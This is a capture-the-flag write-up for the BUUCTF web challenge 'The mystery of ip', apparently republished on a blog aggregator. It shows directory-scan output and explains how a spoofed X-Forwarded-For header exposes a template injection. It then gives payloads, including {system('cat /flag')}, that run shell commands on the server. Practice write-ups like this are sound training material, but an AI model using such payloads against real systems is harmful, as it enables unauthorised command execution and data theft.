当前位置:网站首页>BUUCTF WEB [BJDCTF2020]The mystery of ip

BUUCTF WEB [BJDCTF2020]The mystery of ip

2022-04-23 12:33:00 Y1Daa

BUUCTF WEB [BJDCTF2020]The mystery of ip

  • stay hint.php Find a comment in 

    <!-- Do you know why i know your ip? -->

  • stay flag.php See yourself in ip, Associated with the X-Forwarded-For. Use Hackbar Add one HTTP head 

    X-Forwarded-For: 127.0.0.1

    Echo as 

    Your IP is : 127.0.0.1

    It shows that we have obtained controllable variables

  • Attempt to inject command failed , There's no idea here , Try dirsearch See if you can get any information 

    # Dirsearch started Fri Apr 22 02:06:43 2022 as: dirsearch.py -u http://node4.buuoj.cn:28825/

200     6KB  http://node4.buuoj.cn:28825/.DS_Store
301   169B   http://node4.buuoj.cn:28825/css    -> REDIRECTS TO: http://node4.buuoj.cn/css/
200     2KB  http://node4.buuoj.cn:28825/flag.php
200   938B   http://node4.buuoj.cn:28825/header.php
301   169B   http://node4.buuoj.cn:28825/img    -> REDIRECTS TO: http://node4.buuoj.cn/img/
301   169B   http://node4.buuoj.cn:28825/libs    -> REDIRECTS TO: http://node4.buuoj.cn/libs/
301   169B   http://node4.buuoj.cn:28825/templates_c    -> REDIRECTS TO: http://node4.buuoj.cn/templates_c/
403   555B   http://node4.buuoj.cn:28825/templates_c/

    We found one called /template_c/ Folder , Template injection is suspected

  • take X-Forwarded-For Change it to 

    X-Forwarded-For: {6*6}

    Echo as 

    Your IP is : 36

  • Attempt to read directly flag file 

    X-Forwarded-For: {system('cat /flag')}

    The echo 

    Your IP is : flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b} flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b}

版权声明
本文为[Y1Daa]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231227159550.html

边栏推荐

猜你喜欢

随机推荐